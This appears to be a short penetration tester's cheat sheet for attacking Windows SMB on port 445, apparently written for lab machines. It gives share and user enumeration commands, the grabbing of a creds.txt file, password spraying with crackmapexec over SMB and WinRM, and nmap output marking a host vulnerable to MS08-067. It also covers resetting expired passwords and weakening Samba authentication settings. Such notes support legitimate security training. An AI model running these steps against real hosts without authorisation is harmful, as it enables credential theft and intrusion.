445 SMB
username enum:
nmap --script "safe or smb-enum-*" -p 445 IP
smbmap -H 10.129.1.225
Looks like we can read from general and Development.
smbmap -H 10.129.1.225 -R --depth 5
Running this will go in those directories and discover files.
smbclient //10.129.1.225/general
and download the file (get creds.txt)
creds.txt content
smbclient "\\\\IP\\Bob Share" --no-pass
- 1.Create a user name list and a password list after initial enumeration. i.e) use cewl or hashcat for password list.
cme smb IP -u users.txt -p pass.txt --continue-on-success
rpcclient -U user IP
once you get in you can perform these commands
enumdomusers #get all the usernames
queryuser [0x40] (enter rid)
enumprinters
cme winrm IP -u user -p 'PASS'
smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
only need to change the rhost to exploit it.
if you get the status (NT_STATUS_PASSWORD_MUST_CHANGE) after entering correct credentials, you can set a new password with this command.
smbpasswd -U user -r IP
#Server requested LANMAN password (share-level security) but 'client lanman auth = no' or 'client ntlmv2 auth = yes'
#In the /etc/samba/smb.conf file to be able to connect to those old servers.
client lanman auth = yes
client ntlmv2 auth = no
Last modified 9mo ago